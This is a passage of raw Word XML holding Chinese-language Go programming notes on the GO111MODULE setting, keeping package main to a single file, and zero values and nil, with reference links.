      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>}</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tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>}()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372A7AA5" w14:textId="77777777" w:rsidR="00226A7C" w:rsidRPr="00F07663" w:rsidRDefault="00226A7C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D6788DB" w14:textId="77777777" w:rsidR="00F07663" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00035F04" w14:textId="77777777" w:rsidR="00F07663" w:rsidRDefault="00F07663" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5852B6F2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="378" w:name="_Toc159779829"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go env</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GO111MODULE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是什么</w:t>
      </w:r>
      <w:bookmarkEnd w:id="378"/>
    </w:p>
    <w:p w14:paraId="78414C75" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>更改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GO111MODULE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F2FF1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go env -w GO111MODULE=auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537F321A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B1EB88" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有三个状态</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: on off auto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5A350" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A7704E9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>: https://blog.csdn.net/waltonhuang/article/details/108517944</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0304381D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53E95F5D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>差异总结如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFC60C8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>最初</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>发布的时候是没有包管理的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>go get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>命令会根据路径，把相应的模块获取并保存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>$GOPATH/src</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>也没有版本的概念，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>`master`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就代表稳定的版本</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F19BC02" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>引入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Go Module</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>后，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>GO1.11</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>引入，不再是只有一个版本了，利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>go.mod</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>记录每个包的版本</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194E9363" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>GO111MODULE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>改变</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>引入包的方式。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7678FDC6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AAC99B5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A916322" w14:textId="01B9E51D" w:rsidR="004C452C" w:rsidRDefault="00706623" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="379" w:name="_Toc159779830"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不要把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>真的当包使用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="379"/>
    </w:p>
    <w:p w14:paraId="6694F9E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43FA8DE3" w14:textId="682BEAD0" w:rsidR="00706623" w:rsidRDefault="00C65D4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我发现个问题，命名了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>名字的多个文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543670FD" w14:textId="161618FC" w:rsidR="00C65D4A" w:rsidRDefault="00C65D4A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后</w:t>
      </w:r>
      <w:r w:rsidR="006507A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="006507A8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中跨文件有多处调用，</w:t>
      </w:r>
      <w:r w:rsidR="00BD483A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00BD483A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>goland</w:t>
      </w:r>
      <w:r w:rsidR="00BD483A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译就是报错</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0976E6D9" w14:textId="2AD139C8" w:rsidR="00BD483A" w:rsidRDefault="00BD483A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>后来发现</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是有特殊含义的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本身不能当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>那样随意使用，最好还是定义个其他名字的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pkg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，把代码放进去使用。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B3DD54" w14:textId="77777777" w:rsidR="00BD483A" w:rsidRDefault="00BD483A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F4C3ACB" w14:textId="1309AFE2" w:rsidR="00BD483A" w:rsidRDefault="00BD483A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的话，最好就一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:t>.go</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D075B74" w14:textId="77777777" w:rsidR="00706623" w:rsidRDefault="00706623" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C43D1A1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50CE0EF7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="380" w:name="_Toc159779831"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>对不同类型的空、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的理解</w:t>
      </w:r>
      <w:bookmarkEnd w:id="380"/>
    </w:p>
    <w:p w14:paraId="0C20EEC7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId123" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a5"/>
            <w:rFonts w:hint="eastAsia"/>
          </w:rPr>
          <w:t>https://fivezh.github.io/2020/03/09/golang-nil/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="667501FC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31DA1B81" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>bool      -&gt; false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175E007A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>numbers -&gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C450F48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>string    -&gt; ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5067F128" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pointers -&gt; nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9B679E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slices -&gt; nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE2FB4D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>maps -&gt; nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CFB030" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channels -&gt; nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA6D49D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>functions -&gt; nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D376732" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interfaces -&gt; nil</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="617ED309" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5972F35C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据官方定义，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是预定义标识，代表了指针</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pointer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、通道</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、函数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、切片</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>slice</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类型变量的零值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EEEA43" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D9DDE03" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5AF27B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil is a predeclared identifier representing the zero value for a pointer, channel, func, interface, map, or slice type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081526EA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也就是说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>nil</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>仅是下列</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中类型的零值：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E828466" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="601E0908" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>pointer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4D58C9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615411E6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
